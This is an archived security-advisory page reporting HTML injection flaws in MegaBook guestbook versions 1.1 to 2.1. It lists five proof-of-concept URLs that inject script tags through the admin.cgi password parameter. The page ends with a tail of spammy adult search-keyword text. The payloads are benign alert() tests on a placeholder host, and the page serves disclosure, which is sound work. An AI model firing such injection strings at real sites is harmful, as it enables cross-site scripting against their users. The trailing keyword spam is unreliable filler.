exploits , vulnerabilities , articles , MegaBook Multiple HTML Injection Vulnerabilities

Title	MegaBook Multiple HTML Injection Vulnerabilities
Published	2003-06-29-12:00AM
Updated	2005-05-09-03:07PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery is credited to "morning_wood" <se_cur_ity@hotmail.com>.
Vulnerable	MegaBook MegaBook 2.1 MegaBook MegaBook 2.0 MegaBook MegaBook 1.1
Not Vulnerable
Code	There is no exploit required. The following proof of concepts have been made available by SpyHat: http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script> http://www.example.com/admin.cgi?action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script> http://www.example.com/admin.cgi?action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script> http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script> http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>
TXT

Vulnerabilities - newest 10 RSS | More

2009-01-09 MODx Prior to 0.9.6.3 Multiple Cross Site Scripting Vulnerabilities
2009-01-09 Check Point SecurePlatform Unspecified Remote Security Vulnerability
2009-01-09 Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability
2009-01-09 NetGear WG102 SNMP Write Community String Information Disclosure Vulnerability
2009-01-09 Serv-U Remote Denial of Service Vulnerabilities
2009-01-09 QuoteBook Information Disclosure, SQL Injection and HTML Injection Vulnerabilities
2009-01-08 Oracle January 2009 Oracle Critical Patch Update Pre-Release Announcement Multiple Vulnerabilities
2009-01-08 Microsoft January 2009 Advance Notification Multiple Vulnerabilities
2009-01-08 IBM WebSphere DataPower XML Security Gateway XS40 Remote Denial Of Service Vulnerability
2009-01-08 Drupal Project Release Module Multiple Remote Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 10 Jan 2009 00:00:21 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
tanmilsexy Sexclip 96.c0m movies PunBB 1.2. america gi incinte XXX movis vedeoes de movies www.sex300 japanese g search/exp HINDI MOVI sexgerl WWW.PHOTOS rasarisi filmes de www.18-21y KUSHPOO TA african se Virgin les phplib.htm www.89.c0m nude amrit joomla cms bears fort porno Tamalian.c Akal Tagger LE. Www.Naruto